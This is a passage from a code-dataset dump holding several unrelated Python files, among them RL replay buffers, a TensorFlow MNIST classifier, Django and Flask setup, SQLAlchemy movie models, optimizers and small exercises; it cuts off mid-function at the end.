dones\r\n\r\n    def __len__(self):\r\n        return min(self.ind_max, self.capacity)\r\n\r\n\r\nclass ProportionalReplayBuffer(object):\r\n    def __init__(self, capacity, batch_size=64):\r\n        """\r\n        Initialize a proportional replay buffer: it stores the required transitions, records each transition's TD-error, and defines alpha.\r\n        :param capacity: capacity of the replay buffer\r\n        :param batch_size: size of each batch sampled from the replay buffer\r\n        """\r\n        self.alpha = ALPHA\r\n        self.epsilon = EPSILON\r\n        self.capacity = capacity\r\n        self.memory = [None for _ in range(capacity)]\r\n        self.tree = SumTree(self.capacity)\r\n        self.max_index = 0\r\n        self.default_delta = TD_INIT\r\n        self.batch_size = batch_size\r\n\r\n    def remember(self, transition):\r\n        """\r\n        :param state:\r\n        :param action:\r\n        :param reward:\r\n        :param next_state:\r\n        :param done:\r\n        :return:\r\n        """\r\n        index = self.max_index % self.capacity\r\n        self.memory[index] = transition\r\n        # delta = max(self.tree.nodeVal[-self.capacity:])\r\n        # if delta == 0:\r\n        #     delta = self.default_delta\r\n        delta = self.default_delta + EPSILON - self.tree.nodeVal[index + self.capacity - 1]\r\n        self.tree.update(delta, index)\r\n        self.max_index += 1\r\n\r\n    def sample(self, batch_size):\r\n        """\r\n        Sample uniformly across the segments of the priority total; the segments differ in length, so leaf nodes covering a larger range of the SumTree are clearly more likely to be retrieved.\r\n        :return: everything that was sampled\r\n        """\r\n        index_set = [self.tree.retrieve(self.tree.nodeVal[0] * random.random()) for _ in range(batch_size)]\r\n        probs = torch.from_numpy(\r\n            np.vstack([self.tree.nodeVal[ind + self.capacity - 1] / self.tree.nodeVal[0] for ind in index_set])).float()\r\n        states = 
torch.from_numpy(np.vstack([self.memory[ind][0] for ind in index_set])).float()\r\n        actions = torch.from_numpy(np.vstack([self.memory[ind][1] for ind in index_set])).long()\r\n        rewards = torch.from_numpy(np.vstack([self.memory[ind][2] for ind in index_set])).float()\r\n        next_states = torch.from_numpy(np.vstack([self.memory[ind][3] for ind in index_set])).float()\r\n        dones = torch.from_numpy(np.vstack([self.memory[ind][4] for ind in index_set]).astype(np.uint8)).float()\r\n\r\n        return index_set, states, actions, rewards, next_states, dones, probs\r\n\r\n    def insert(self, delta, index):\r\n        change = (delta + self.epsilon) ** self.alpha - self.tree.nodeVal[index + self.capacity - 1]\r\n        self.tree.update(change, index)\r\n\r\n    def __len__(self):\r\n        return min(self.capacity, self.max_index)\r\n\r\n\r\nclass RankedReplayBuffer(object):\r\n    def __init__(self, capacity, batch_size=64):\r\n        """\r\n        Initialize a rank-based replay buffer: maintain a sorted array of TD-errors, define segments that partition the ranks, accumulate all errors in total_error,\r\n        and keep the stage-wise cumulative errors in cumulative_weights, which are used to split the segments.\r\n        :param capacity: capacity of the replay buffer\r\n        :param batch_size: size of each batch sampled from the replay buffer\r\n        """\r\n        self.alpha = ALPHA\r\n        self.epsilon = EPSILON\r\n        self.capacity = capacity\r\n        self.memory = [None for _ in range(self.capacity)]\r\n        self.max_index = 0\r\n        self.default_delta = 1.\r\n        self.batch_size = batch_size\r\n        self.total_error = 0.\r\n        self.cumulative_weights = []\r\n        self.errors = []\r\n        self.memory_to_rank = [None for _ in range(self.capacity)]\r\n        self.segments = [-1] + [None for _ in range(self.batch_size)]\r\n\r\n    def remember(self, transition):\r\n        """\r\n        Update the replay buffer, evicting and inserting in round-robin order. The new transition is inserted with its TD-error set to the largest\r\n        error currently in the sorted error array; the array is then kept sorted while recording the rank index each entry corresponds to.\r\n        :param transition: contains state, action, reward, next_state, done; it is stored in the buffer's memory\r\n        """\r\n        index = self.max_index % self.capacity\r\n        if self.max_index < self.capacity:  # while the memory is not yet full of transitions\r\n            self.total_error = (1 / (self.max_index + 1)) ** self.alpha\r\n            self.cumulative_weights.append(self.total_error)\r\n            self.update_segments()\r\n        else:\r\n            self.pop(index)\r\n\r\n        self.memory[index] = transition\r\n        # on the very first insertion the error array is still empty, so fall back to the default delta\r\n        max_error = -self.errors[0][0] if self.errors else self.default_delta\r\n        self.insert(max_error, index)\r\n        self.max_index += 1\r\n\r\n    def pop(self, index):\r\n        idx = self.memory_to_rank[index]\r\n        self.errors.pop(idx)\r\n        self.memory_to_rank[index] = None\r\n        for i in range(idx, len(self.errors)):\r\n            self.memory_to_rank[self.errors[idx][1]] -= 1\r\n\r\n    def insert(self, error, index):\r\n        sort_idx = bisect.bisect_left(self.errors, (-error, index))\r\n        self.memory_to_rank[index] = sort_idx\r\n        self.errors.insert(sort_idx, (-error, index))\r\n        for i in range(sort_idx + 1, len(self.errors)):\r\n            self.memory_to_rank[self.errors[sort_idx][1]] += 1\r\n\r\n    def update_segments(self):\r\n        if self.max_index + 1 < self.batch_size:\r\n            return None\r\n        for i in range(self.batch_size):\r\n            sort_index = bisect.bisect_left(self.cumulative_weights, self.total_error * ((i + 1) / self.batch_size))\r\n            self.segments[i] = max(sort_index, self.segments[i] + 1)\r\n\r\n    def sample(self):\r\n        index_list = [random.randint(self.segments[i] + 1, self.segments[i + 1]) for i in range(self.batch_size)]\r\n        # rank-based priority: p(i) is proportional to (1 / rank) ** alpha\r\n        probs = torch.from_numpy(\r\n            np.vstack([(1 / (1 + index)) ** self.alpha / self.total_error for index in index_list])).float()\r\n        index_list = [self.errors[index][1] for index in index_list]\r\n\r\n        states = torch.from_numpy(np.vstack([self.memory[index][0] for index in 
index_list])).float()\r\n actions = torch.from_numpy(np.vstack([self.memory[index][1] for index in index_list])).long()\r\n rewards = torch.from_numpy(np.vstack([self.memory[index][2] for index in index_list])).float()\r\n next_states = torch.from_numpy(np.vstack([self.memory[index][3] for index in index_list])).float()\r\n dones = torch.from_numpy(np.vstack([self.memory[index][4] for index in index_list])).float()\r\n\r\n return index_list, probs, states, actions, rewards, next_states, dones\r\n","sub_path":"03_C51/replay_buffer.py","file_name":"replay_buffer.py","file_ext":"py","file_size_in_byte":7882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"333137601","text":"from __future__ import absolute_import,print_function,division\nimport os\nos.environ[\"TF_CPP_MIN_LOG_LEVEL\"] = '2'\nimport tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport utils\n\n\n\n\nclass q2b_model:\n def __init__(self):\n self.learning_rate = 5e-4\n self.batch_size = 128\n self.keep_prob = tf.constant(0.2)\n self.num_class = 10\n self.num_test = 10000\n self.training = True\n def _get_data(self):\n with tf.variable_scope(\"data\"):\n trainset, testset = utils.get_mnist_dataset(self.batch_size)\n iterator = tf.data.Iterator.from_structure(trainset.output_types,\n trainset.output_shapes)\n self.img, self.labels = iterator.get_next()\n self.train_init = iterator.make_initializer(trainset)\n self.test_init = iterator.make_initializer(testset)\n def _create_model(self):\n with tf.variable_scope(\"model\"):\n dense1 = tf.layers.dense(inputs=self.img,\n units=400,\n\n kernel_regularizer=tf.contrib.layers.l2_regularizer(1e-3))\n relu1 = tf.nn.relu(dense1)\n dropout1 = tf.layers.dropout(inputs=relu1,\n rate=self.keep_prob,\n training=self.training)\n dense2 = tf.layers.dense(inputs=dropout1,\n units=200,\n kernel_regularizer=tf.contrib.layers.l2_regularizer(1e-3))\n relu2 = tf.nn.relu(dense2)\n dropout2 = tf.layers.dropout(inputs=relu2,\n rate=self.keep_prob,\n training=self.training)\n self.logits = tf.layers.dense(inputs=dropout2,\n units=self.num_class)\n\n entropy = tf.nn.softmax_cross_entropy_with_logits(logits=self.logits,\n labels=self.labels)\n self.loss = tf.reduce_mean(entropy)\n with tf.variable_scope(\"predict\"):\n pred = tf.nn.softmax(self.logits)\n correct_pred = tf.equal(tf.argmax(pred, 1), tf.argmax(self.labels, 1))\n self.accuracy = tf.reduce_sum(tf.cast(correct_pred, tf.float32))\n def _create_optimizer(self):\n with tf.variable_scope(\"optimizer\"):\n self.optimizer = tf.train.AdamOptimizer(self.learning_rate).minimize(self.loss)\n def _create_summaries(self):\n with tf.variable_scope(\"summaries\"):\n tf.summary.scalar(\"loss\", self.loss)\n tf.summary.histogram(\"histogram_loss\", self.loss)\n self.summary_op = tf.summary.merge_all()\n\n def build_graph(self):\n self._get_data()\n self._create_model()\n self._create_optimizer()\n self._create_summaries()\n def train(self, num_epochs):\n saver = tf.train.Saver()\n with tf.Session() as sess:\n writer = tf.summary.FileWriter(\"graphs/q2b/\",sess.graph)\n sess.run(tf.global_variables_initializer())\n ckpt = tf.train.get_checkpoint_state(\"checkpoints/q2b/\")\n if ckpt and ckpt.model_checkpoint_path:\n saver.restore(sess, ckpt.model_checkpoint_path)\n print(\"restore existed model parameters\", ckpt.model_checkpoint_path)\n for i in range(num_epochs):\n sess.run(self.train_init)\n self.training = True\n try:\n while True:\n batch_loss, _, summaries = sess.run([self.loss, 
self.optimizer, self.summary_op])\n                        writer.add_summary(summaries, global_step=i)\n                except tf.errors.OutOfRangeError:\n                    pass\n                sess.run(self.test_init)\n                self.training = False\n                acc = 0\n                try:\n                    while True:\n                        acc += sess.run(self.accuracy)\n                except tf.errors.OutOfRangeError:\n                    pass\n                saver.save(sess, "checkpoints/q2b/q2b",i)\n                print("epochs at", i+1, "Accuracy of this testset:", acc/self.num_test)\n            writer.close()\nif __name__ == "__main__":\n    model = q2b_model()\n    model.build_graph()\n    model.train(100)\n","sub_path":"assignments/01/q2b.py","file_name":"q2b.py","file_ext":"py","file_size_in_byte":4420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"99566630","text":"from users import views\n\nfrom blogster.imports.CommanImportsForUrl import *\nfrom blogster.ViewsListMap import * \n\nurlpatterns = [\n    path('',BloggerDashboard.as_view(), name='dashboard'),\n    path('/setting',DashboardSettings.as_view(), name='dashboard-setting'),\n    path('/Update', UpdateBlogger.as_view(), name='updateblogger'),\n    # path('/sociallinksupdate', Update_social_media_urls.as_view(), name='updatebloggersociallinks'),\n    path('/Delete', DeleteBlogger.as_view(), name='deleteblogger'),\n    # path('/Manage-SEO', Update_Blogger_SE0.as_view(), name='manage_blogger_seo'),\n#     path('/personal-link', Update_personal_website_link.as_view(), name='updatebloggerpersonallinks'),\n]\nif settings.DEBUG:\n    urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n    urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n","sub_path":"Bloggers/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"568088940","text":"#-*-coding:utf8-*-\n# @time: \n# @author:张新新\n# @email: 1262981714@qq.com\nimport numpy as np\ndef get_imgpoint_depth(imgpoints,objpoints,depth_img):\n    """\n    Get the depth value for each image point; note that the RGB image must be aligned with the depth image.\n    :param imgpoints:\n    :param depth_img:\n    :return:\n    """\n    objPoint_acc = np.array([])\n    depth_point_acc = np.array([])\n    imgPoint_acc = np.array([])\n    n = imgpoints.shape[0]\n    for j in range(n):\n        depth = depth_img[int(imgpoints[j, 1]), int(imgpoints[j, 0])] / 1000.0\n        if depth == 0:\n            continue\n        objPoint_acc = np.append(objPoint_acc, objpoints[j, :])\n        imgPoint_acc = np.append(imgPoint_acc, imgpoints[j, :])\n\n        # depth_point_acc = np.append(depth_point_acc,Point_cam_cood[i,:])\n        depth_point_acc = np.append(depth_point_acc, depth)\n    objPoint_acc = objPoint_acc.reshape([-1, 2])\n    imgPoint_acc = imgPoint_acc.reshape([-1, 2])\n    depth_point_acc = depth_point_acc.reshape([-1, 1])\n    return imgPoint_acc, objPoint_acc, depth_point_acc","sub_path":"calibration_utils/depth_utils.py","file_name":"depth_utils.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"595599539","text":"from django.urls import path\nfrom .views import (PostDetailView, PostCreateView, \n    PostUpdateView, PostDeleteView\n    , SearchView)\nfrom . 
import views\n\nurlpatterns = [\n path('', views.home, name=\"blog-home\"),\n path('about/', views.about, name=\"blog-about\"),\n path('post/new', PostCreateView.as_view(), name=\"post-create\"),\n path('post/', PostDetailView.as_view(), name=\"blog-detail\"),\n path('post//delete', PostDeleteView.as_view(), name=\"post-delete\"),\n path('post//update', PostUpdateView.as_view(), name=\"post-update\"),\n path('search/', SearchView.as_view(template_name=\"blog/search.html\"), name=\"search\")\n \n]","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"101828373","text":"def solution(arr, divisor):\n answer = []\n\n for num in arr:\n if num % divisor == 0:\n answer.append(num)\n\n if len(answer) == 0:\n answer.append(-1)\n\n answer.sort()\n return answer\n\n\nsolution([5, 9, 7, 10], 5) # [5,10]\nsolution([2, 36, 1, 3], 1) # [1,2,3,36]\nsolution([3, 2, 6], 10) # [-1]\n","sub_path":"PYTHON/PROGRAMMERS/LEVEL1/나누어_떨어지는_숫자_배열.py","file_name":"나누어_떨어지는_숫자_배열.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"49825360","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Oct 28 14:34:05 2018\n\n@author: xsxsz\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nX = np.array([0 , 4, 10, 15, 21, 29, 36, 51, 68,100])\ny = np.array([[66.7, 71.0, 76.3, 80.6, 85.7, 92.9, 99.4, 113.6, 125.1,140]])\nX_T=np.ones(len(X)).astype(dtype=np.int)\nX_new=np.array([X_T,X])\ntemp=np.matrix(np.dot(X_new,X_new.T))\nans= temp ** -1 * X_new * y.T\nintercept=np.array(ans)[0][0]\ncoef=np.array(ans)[1][0]\nlx=np.arange(0,100)\nly=coef*lx+intercept\nplt.figure(figsize=(5,6))\nplt.title('normal equation')\nplt.xlabel('X')\nplt.ylabel('Y')\nplt.scatter(X,y,color='b')\nplt.plot(lx,ly,color='g')\n","sub_path":"others/normal_equation.py","file_name":"normal_equation.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"234174305","text":"from collections import deque\n\nfrom loader import Matrix2D\n\nfrom .inner_edge_optimizer import LocalInnerEdgeOptimizer\nfrom .base import TimerOptimizer, Route, Solution, Optimizer\nimport numpy as np\nimport random\n\n\nclass RandomOptimizer(TimerOptimizer):\n def _find_solution(self):\n best_solution = Solution(np.inf, self.route)\n route: Route = self.route[:]\n\n while True:\n random.shuffle(route)\n\n score = self._calculate_score(route)\n if score < best_solution.cost:\n best_solution = Solution(score, route[:])\n\n yield best_solution\n\n\nclass MultiStartLocalSearchOptimizer(Optimizer):\n\n def __init__(self, distance_matrix: Matrix2D, route: Route):\n super().__init__(distance_matrix, route)\n self.n_iter = 20\n\n def _search(self) -> Solution:\n best_solution = Solution(np.inf, self.route)\n route: Route = self.route[:]\n\n for _ in range(self.n_iter):\n random.shuffle(route)\n opt = LocalInnerEdgeOptimizer(self.distance_matrix, route)\n sol = opt()\n\n if sol.cost < best_solution.cost:\n best_solution = Solution(sol.cost, sol.route[:])\n\n return best_solution\n","sub_path":"p5/optimizers/random_optimizer.py","file_name":"random_optimizer.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"477228300","text":"from .Conn 
import db\n\n#Establishes table schema as classes and determines the methods that contains the data note the foreign keys it means there needs to be a specific order things are added to the database\n\nclass Movie(db.Model):\n __tablename__ = 'movies'\n id = db.Column(db.Integer, primary_key=True)\n title = db.Column(db.String(200), nullable=False)\n year = db.Column(db.Integer, nullable=False)\n runtime = db.Column(db.Integer, nullable=False)\n mov_rel_dt = db.Column(db.Date, nullable=False)\n mov_plot = db.Column(db.String(450))\n ratings = db.relationship('Ratings', backref='Movie', lazy=True)\n Cast = db.relationship('Actors', secondary='movie_cast' )\n mov_writers = db.relationship('Writer', secondary='movie_writers')\n mov_genres = db.relationship('Genre', secondary='movie_genres' )\n languages = db.relationship('Lang', secondary='movie_lang')\n countries = db.relationship('Release_Country', secondary = 'movie_release_country')\n movie_std = db.relationship('Studio', secondary = 'movie_studios')\n movie_director = db.relationship('Directors', secondary = 'movie_directors')\n def __init__(self, title, year, runtime, mov_rel_dt, mov_plot):\n self.title = title\n self.year = year\n self.runtime = runtime\n self.mov_rel_dt = mov_rel_dt\n self.mov_plot = mov_plot\n \n\nclass Directors(db.Model):\n __tablename__ = 'directors'\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(50), unique=True, nullable=False)\n moviesd = db.relationship('Movie', secondary='movie_directors')\n def __init__(self, name):\n self.name = name\n\nclass Genre(db.Model):\n __tablename__ = 'genre'\n id = db.Column(db.Integer, primary_key=True)\n genre = db.Column(db.String(50), unique=True, nullable=False)\n moviesg = db.relationship(\"Movie\", secondary=\"movie_genres\")\n def __init__(self, genre):\n self.genre = genre\n\nclass Actors(db.Model):\n __tablename__ = 'actors'\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(50), unique=True, nullable=False)\n moviesa = db.relationship(\"Movie\", secondary=\"movie_cast\")\n def __init__(self, name):\n self.name = name\n\nclass Studio(db.Model):\n __tablename__ = 'studio'\n id = db.Column(db.Integer, primary_key=True)\n studioname = db.Column(db.String(50), unique=True, nullable=False)\n moviess = db.relationship(\"Movie\", secondary=\"movie_studios\")\n def __init__(self, studioname):\n self.studioname = studioname\n\nclass Ratings(db.Model):\n __tablename__ = 'ratings'\n id = db.Column(db.Integer, primary_key=True)\n movie_id = db.Column(db.Integer, db.ForeignKey('movies.id'), nullable=False)\n outlet = db.Column(db.String(50), nullable=False)\n score = db.Column(db.Float(15), nullable=False)\n def __init__(self, movie_id, outlet, score):\n self.movie_id = movie_id\n self.outlet = outlet\n self.score = score\n\nclass Writer(db.Model):\n __tablename__ = 'writer'\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(50), unique=True, nullable=False)\n moviesw = db.relationship(\"Movie\", secondary=\"movie_writers\")\n def __init__(self, name):\n self.name = name\n\nclass Movie_Cast(db.Model):\n __tablename__ = 'movie_cast'\n id = db.Column(db.Integer, primary_key=True)\n movies_id = db.Column(db.Integer, db.ForeignKey('movies.id'))\n actors_id = db.Column(db.Integer, db.ForeignKey('actors.id'))\n movie = db.relationship(Movie, backref=db.backref('movie_cast', cascade=\"all, delete-orphan\"))\n actor = db.relationship(Actors, backref=db.backref('movie_cast', cascade=\"all, delete-orphan\"))\n def 
__init__(self, movies_id, actors_id):\n self.movies_id = movies_id\n self.actors_id = actors_id\n\nclass Movie_Directors(db.Model):\n __tablename__ = 'movie_directors'\n id = db.Column(db.Integer, primary_key=True)\n movies_id = db.Column(db.Integer, db.ForeignKey('movies.id'))\n director_id = db.Column(db.Integer, db.ForeignKey('directors.id'))\n movie = db.relationship(Movie, backref=db.backref('movie_directors', cascade=\"all, delete-orphan\"))\n director = db.relationship(Directors, backref=db.backref('movie_directors', cascade=\"all, delete-orphan\"))\n def __init__(self, movies_id, director_id):\n self.movies_id = movies_id\n self.director_id = director_id\n\nclass Movie_Writers(db.Model):\n __tablename__ = 'movie_writers'\n id = db.Column(db.Integer, primary_key=True)\n movies_id = db.Column(db.Integer, db.ForeignKey('movies.id'))\n writer_id = db.Column(db.Integer, db.ForeignKey('writer.id'))\n movie = db.relationship(Movie, backref=db.backref('movie_writers', cascade=\"all, delete-orphan\"))\n writer = db.relationship(Writer, backref=db.backref('movie_writer', cascade=\"all, delete-orphan\"))\n def __init__(self, movies_id, writer_id):\n self.movies_id = movies_id\n self.writer_id = writer_id\n\nclass Movie_Genres(db.Model):\n __tablename__ = 'movie_genres'\n id = db.Column(db.Integer, primary_key=True)\n movies_id = db.Column(db.Integer, db.ForeignKey('movies.id'))\n genre_id = db.Column(db.Integer, db.ForeignKey('genre.id'))\n movie = db.relationship(Movie, backref=db.backref('movie_genres', cascade=\"all, delete-orphan\"))\n genre = db.relationship(Genre, backref=db.backref('movie_genres', cascade=\"all, delete-orphan\"))\n def __init__(self, movies_id, genre_id):\n self.movies_id = movies_id\n self.genre_id = genre_id\n\nclass Release_Country(db.Model):\n __tablename__ = 'country'\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(74))\n moviesrc = db.relationship(\"Movie\", secondary=\"movie_release_country\")\n def __init__(self, name):\n self.name = name\n\nclass Movie_Rel_Country(db.Model):\n __tablename__ = 'movie_release_country'\n id = db.Column(db.Integer, primary_key=True)\n movies_id = db.Column(db.Integer, db.ForeignKey('movies.id'))\n country_id = db.Column(db.Integer,db.ForeignKey('country.id'))\n movie = db.relationship(Movie, backref=db.backref('movie_release_country', cascade=\"all, delete-orphan\"))\n country = db.relationship(Release_Country, backref=db.backref('movie_release_country', cascade=\"all, delete-orphan\"))\n def __init__(self, movies_id, country_id):\n self.movies_id = movies_id\n self.country_id = country_id\n\nclass Lang(db.Model):\n __tablename__ = 'languages'\n id = db.Column(db.Integer, primary_key=True)\n language = db.Column(db.String(85), nullable=False)\n moviesl = db.relationship(\"Movie\", secondary=\"movie_lang\")\n def __init__(self, language):\n self.language = language\n\nclass Movie_Lang(db.Model):\n __tablename__ = 'movie_lang'\n id = db.Column(db.Integer, primary_key=True)\n movies_id = db.Column(db.Integer, db.ForeignKey('movies.id'))\n language_id = db.Column(db.Integer, db.ForeignKey('languages.id'))\n movie = db.relationship(Movie, backref=db.backref('movie_lang', cascade=\"all, delete-orphan\"))\n lang = db.relationship(Lang, backref=db.backref('movie_lang', cascade=\"all, delete-orphan\"))\n def __init__(self, movies_id, language_id):\n self.movies_id = movies_id\n self.language_id = language_id\n\nclass Movie_Studio(db.Model):\n __tablename__ = 'movie_studios'\n id = db.Column(db.Integer, 
primary_key=True)\n    movies_id = db.Column(db.Integer, db.ForeignKey('movies.id'))\n    studio_id = db.Column(db.Integer, db.ForeignKey('studio.id'))\n    movie = db.relationship(Movie, backref=db.backref('movie_studios', cascade=\"all, delete-orphan\"))\n    studio = db.relationship(Studio, backref=db.backref('movie_studios', cascade=\"all, delete-orphan\"))\n    def __init__(self,movies_id,studio_id):\n        self.movies_id = movies_id\n        self.studio_id = studio_id","sub_path":"OMDB/backend/src/entities/Movie.py","file_name":"Movie.py","file_ext":"py","file_size_in_byte":7867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"70925758","text":"from flask import Flask\nfrom config import Config\nfrom flask_sqlalchemy import SQLAlchemy\n#from flask_script import Manager\nfrom flask_migrate import Migrate #, MigrateCommand\nfrom flask_login import LoginManager\nfrom flask_bootstrap import Bootstrap\nfrom flask_moment import Moment\nfrom flask_mail import Mail\nimport logging\nfrom logging.handlers import SMTPHandler, RotatingFileHandler\nfrom flask_uploads import UploadSet, ARCHIVES, configure_uploads, IMAGES\nimport os\nfrom redis import Redis\nimport rq\n\n'''\nWhat we need to add to this application...\nHome page - see upload form that incorporates the date used to save files in a new folder.\nPath saved in database , given a file ID which is connected to the user. \n\nThen that file is passed through the 'scriptts.py' which will then process the images\n\nOutput.py template will then be rendered with results...\n\nResults.py will be logged on the user's profile page, \nThere will be a relational database of outputs connected to each uploaded zip folder. \n\nHome will show the completeness of laboratory tests. w/ downloadable zip folders \nof all output data for that test...\n\n'''\nbootstrap = Bootstrap() #Bootstrap uses three level hierarchy...\nlogin = LoginManager()\nlogin.login_view = 'auth.login' #function or endpoint name for login view\nmail = Mail()\n\ndb = SQLAlchemy() ##this object represents the database\nmigrate = Migrate() ##this object represents the migration engine\n#manager = Manager()\nmoment = Moment()\n\napp = Flask(__name__)\nphotos = UploadSet('photos', IMAGES)\narchives = UploadSet('archives', ARCHIVES)\n#files = UploadSet('files', FILES)\n\ndef create_app(config_class=Config):\n    \n    app = Flask(__name__)\n    app.config.from_object(config_class)\n    \n    app.config['UPLOADED_PHOTOS_DEST'] = 'static/img/'\n    configure_uploads(app, photos)\n    \n    app.config['UPLOADED_ARCHIVES_DEST'] = 'static/arch/'\n    configure_uploads(app, archives)\n    \n    # create the folders when setting up your app\n    app.config['IMG_PICKED'] = 'static/picked/'\n    \n    # create the folders when setting up your app\n    app.config['TO_DOWNLOAD'] = 'static/to-download/'\n    \n\n    #app.config['UPLOADED_FILES_DEST'] = 'static/files/'\n    #configure_uploads(app, files)\n    \n    app.redis = Redis.from_url(app.config['REDIS_URL'])\n    app.task_queue = rq.Queue('pypick-tasks', connection=app.redis)\n    \n    db.init_app(app)\n    #db.create_all() \n    \n    ###new edits\n    migrate.init_app(app, db)\n    #manager.init_app(app)\n    #manager.add_command('db', MigrateCommand)\n    ###end new edits\n    \n    login.init_app(app)\n    mail.init_app(app)\n    bootstrap.init_app(app)\n    moment.init_app(app)\n\n    from app.errors import bp as errors_bp\n    app.register_blueprint(errors_bp)\n\n    from app.auth import bp as auth_bp\n    app.register_blueprint(auth_bp, url_prefix='/auth')\n\n    from app.main import bp as main_bp\n
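    # Blueprints keep the routes modular: error handlers, auth (mounted at /auth), and the main pages.\n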
    app.register_blueprint(main_bp)\n\n    if not app.debug:\n        \n        if app.config['MAIL_SERVER']:\n            auth = None\n            if app.config['MAIL_USERNAME'] or app.config['MAIL_PASSWORD']:\n                auth = (app.config['MAIL_USERNAME'], app.config['MAIL_PASSWORD'])\n            secure = None\n            if app.config['MAIL_USE_TLS']:\n                secure = ()\n            mail_handler = SMTPHandler(\n                mailhost=(app.config['MAIL_SERVER'], app.config['MAIL_PORT']),\n                fromaddr='no-reply@' + app.config['MAIL_SERVER'],\n                toaddrs=app.config['ADMINS'], subject='Pypick Failure',\n                credentials=auth, secure=secure)\n            mail_handler.setLevel(logging.ERROR)\n            app.logger.addHandler(mail_handler)\n        \n        if not os.path.exists('logs'):\n            os.mkdir('logs')\n        \n        file_handler = RotatingFileHandler('logs/pypick.log', maxBytes=10240,\n                                           backupCount=10)\n        file_handler.setFormatter(logging.Formatter(\n            '%(asctime)s %(levelname)s: %(message)s [in %(pathname)s:%(lineno)d]'))\n        file_handler.setLevel(logging.INFO)\n        app.logger.addHandler(file_handler)\n        \n        app.logger.setLevel(logging.INFO)\n        app.logger.info('pyGemPick web app starting up!')\n    \n    return app\n\n#models defines the structure of the database, routes defines the views of the app\n\n\nfrom app import models\n","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"167127764","text":"import random\n\n#get_file_lines: Takes in a file name and returns the lines of the file as a list of strings.\ndef get_file_lines(filename):\n\n    file_lines = open(filename, 'r')\n    lines_list = file_lines.readlines()\n    return lines_list\n\n#lines_printed_backwards: Takes in a list of strings containing lines of the poem and prints them out backwards with line numbers.\ndef lines_printed_backwards(lines_list):\n\n    num_list = range(len(lines_list))\n    num_list = list(num_list)\n    for num in reversed(num_list):\n        print(f\"{num_list[num]} {lines_list[num]}\")\n\n#lines_printed_random: Takes in a list of strings containing lines of the poem and prints them out in random order.\ndef lines_printed_random(lines_list):\n\n    num_list = range(len(lines_list))\n    num_list = list(num_list)\n    for i in num_list:\n        num = random.randrange(len(lines_list))\n        print(lines_list[num])\n\n#lines_printed_custom: A function which takes in a list of strings containing lines of the poem and prints them out in a unique way (one line from the top and one from the bottom until it reaches the middle of the poem).\n
def lines_printed_custom(lines_list):\n\n    nl = '\\n'\n    for x in range(int(len(lines_list)/2)):\n        print(f\"{x+1} {lines_list[x]}\")\n        print(f\"{len(lines_list) - x} {lines_list[len(lines_list) - x - 1]} {nl}\")\n\np_list = get_file_lines(\"poem.txt\")\n\nlines_printed_backwards(p_list)\nlines_printed_random(p_list)\nlines_printed_custom(p_list)\n","sub_path":"poetry-slam.py","file_name":"poetry-slam.py","file_ext":"py","file_size_in_byte":1436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"250095962","text":"# coding: utf-8\n\nimport sys\nimport re\nimport random\nfrom operator import itemgetter\nfrom collections import Counter\nimport urllib.parse\n\n\ndef count_segments(line):\n    if len(line) == 0:\n        return 0\n    if line[len(line) - 1] == '/':\n        line = line[0:len(line) - 1]\n    return line.count('/', 0, len(line)) - 2\n\n\ndef extract_segments(line):\n    # drop / at the end of url\n    if len(line) > 0 and line[len(line) - 1] == '/':\n        line = line[0:len(line) - 1]\n\n    # drop scheme (defined as scheme:[other url])\n    schema_end = line.find(':')\n    if schema_end != -1:\n        line = line[schema_end + 1:len(line)]\n\n    # drop // from the beginning if exists\n    if line[0:2] == \"//\":\n        line = line[2:len(line)]\n\n    # drop all stuff before path\n    path_begin = line.find('/')\n    if path_begin == -1:\n        return []\n    else:\n        line = line[path_begin + 1:len(line)]\n\n    # drop all stuff after path\n    query_begin = line.find('?')\n    if query_begin != -1:\n        line = line[0:query_begin]\n    fragment_begin = line.find('#')\n    if fragment_begin != -1:\n        line = line[0:fragment_begin]\n\n    # drop / at the end of path part\n    if len(line) > 0 and line[len(line) - 1] == '/':\n        line = line[0:len(line) - 1]\n\n    if len(line) == 0:\n        return []\n    return re.split('/', line)\n\n\ndef extract_param_names(line):\n    names = []\n    start_params = line.find('?')\n    if start_params == -1:\n        return names\n    else:\n        start_params += 1\n\n    end_params = line.find('#')\n    if end_params == -1:\n        end_params = len(line) - 1\n\n    for param_sub in re.split('&', line[start_params:end_params]):\n        names.append(re.split('=', param_sub)[0])\n\n    return names\n\n\ndef extract_params(line):\n    names = []\n    start_params = line.find('?')\n    if start_params == -1:\n        return names\n    else:\n        start_params += 1\n\n    end_params = 